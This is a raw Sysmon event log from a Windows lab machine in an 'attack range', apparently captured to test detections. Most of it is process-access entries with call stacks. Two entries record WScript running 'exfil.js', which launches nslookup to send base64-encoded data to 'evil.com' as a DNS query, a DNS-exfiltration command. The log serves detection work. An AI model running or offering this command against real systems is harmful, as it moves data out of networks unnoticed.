14:16:03.682{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.682{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.680{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E13E-6299-1000-000000005F02}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+1b87d|C:\Windows\system32\lsasrv.dll+2875b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000193817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.663{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhwdnu.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.585{2E1864BB-17A3-629A-7D3D-000000005F02}62327808C:\Windows\system32\conhost.exe{2E1864BB-17A3-629A-7E3D-000000005F02}5216C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.564{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.564{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.564{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A3-629A-7E3D-000000005F02}5216C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.564{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.564{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.564{2E1864BB-17A3-629A-7C3D-000000005F02}23084804C:\Windows\system32\cmd.exe{2E1864BB-17A3-629A-7E3D-000000005F02}5216C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.574{2E1864BB-17A3-629A-7E3D-000000005F02}5216C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A3-629A-7C3D-000000005F02}2308C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhwdnu.tmp 2>&1 10341000x8000000000000000193808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.501{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-17A3-629A-7D3D-000000005F02}6232C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.501{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A3-629A-7D3D-000000005F02}6232C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.485{2E1864BB-17A3-629A-7D3D-000000005F02}62327808C:\Windows\system32\conhost.exe{2E1864BB-17A3-629A-7C3D-000000005F02}2308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.465{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A3-629A-7D3D-000000005F02}6232C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.465{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A3-629A-7C3D-000000005F02}2308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.465{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.465{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.465{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.465{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.465{2E1864BB-17A1-629A-783D-000000005F02}55526408C:\Windows\System32\WScript.exe{2E1864BB-17A3-629A-7C3D-000000005F02}2308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.467{2E1864BB-17A3-629A-7C3D-000000005F02}2308C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhwdnu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000193797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.450{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkkjre.tmpMD5=2F8701F387AF2110E32408D0F4A242C3,SHA256=6A2A0ACD9892C9D73119665C3163E4FB9119D009FEA0026931DDF4E05E5C0E6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.403{2E1864BB-17A3-629A-7A3D-000000005F02}20883288C:\Windows\system32\conhost.exe{2E1864BB-17A3-629A-7B3D-000000005F02}7644C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.403{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.403{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.403{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A3-629A-7B3D-000000005F02}7644C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.403{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.403{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 